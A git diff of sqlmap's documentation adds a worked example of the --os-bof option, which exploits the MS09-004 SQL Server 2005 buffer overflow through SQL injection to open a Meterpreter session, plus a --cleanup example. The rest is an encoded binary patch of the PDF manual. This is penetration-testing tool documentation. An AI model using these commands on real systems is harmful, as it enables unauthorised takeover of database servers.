Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

This technique is detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-bof -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
+stored procedure heap-based buffer overflow (MS09-004)
+[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack
+[hh:mm:14] [INFO] retrieved: 1
+[hh:mm:15] [INFO] retrieved: 1
+[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
+[hh:mm:15] [INFO] testing if current user is DBA
+[hh:mm:15] [INFO] retrieved: 1
+[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:21] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit
+which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 
+which is the back-end DBMS address? [192.168.1.131] 
+which remote port numer do you want to use? [39391] 62719
+which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 
+which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 
+[hh:mm:50] [INFO] creation in progress .................. done
+[hh:mm:08] [INFO] handling DEP
+[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to 
+handle it
+[hh:mm:08] [INFO] checking DEP system policy
+[hh:mm:09] [INFO] retrieved: OPTIN
+[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default
+[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait..
+[*] Please wait while we load the module tree...
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719)
+
+meterpreter > Loading extension priv...success.
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > exit
+
+
+

+

5.10 Miscellaneous

@@ -4216,7 +5065,7 @@ counts the number of retrieved query output characters.

It is possible to update sqlmap to the latest stable version available on its -SourceForge File List page by running it with the +SourceForge File List page by running it with the --update option.

@@ -4233,7 +5082,7 @@ $ python sqlmap.py --update -v 4 [hh:mm:55] [TRAFFIC OUT] HTTP request: GET /doc/VERSION HTTP/1.1 Host: sqlmap.sourceforge.net -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200): @@ -4252,7 +5101,7 @@ X-Pad: avoid browser bug [hh:mm:56] [TRAFFIC OUT] HTTP request: GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1 Host: www.sqlsecurity.com -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; language=en-US Connection: close @@ -4576,8 +5425,34 @@ vulnerable parameter which is the default behaviour.

Option: --cleanup

-

This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper -Advanced SQL injection to operating system full control for the moment.

+

It is recommended to clean up the back-end database management system from +sqlmap temporary tables and created user-defined functions when you are +done with owning the underlying operating system or file system.

+ +

Example on a PostgreSQL 8.3.5 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \
+  -v 2 --cleanup
+
+[...]
+[hh:mm:18] [INFO] cleaning up the database management system
+[hh:mm:18] [DEBUG] removing support tables
+[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] 
+[hh:mm:20] [DEBUG] removing sys_exec UDF
+[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text)
+do you want to remove sys_eval UDF? [Y/n] 
+[hh:mm:21] [DEBUG] removing sys_eval UDF
+[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text)
+[hh:mm:21] [INFO] database management system cleanup finished
+[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can 
+only be deleted manually
+
+
+

6. Disclaimer

diff --git a/doc/README.pdf b/doc/README.pdf index c1ef3345fb578efd42c8bc72ce0eb8983455547a..48c798dd3d2b9931ab8e1285163cd4e55c96ee87 100644 GIT binary patch delta 167172 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 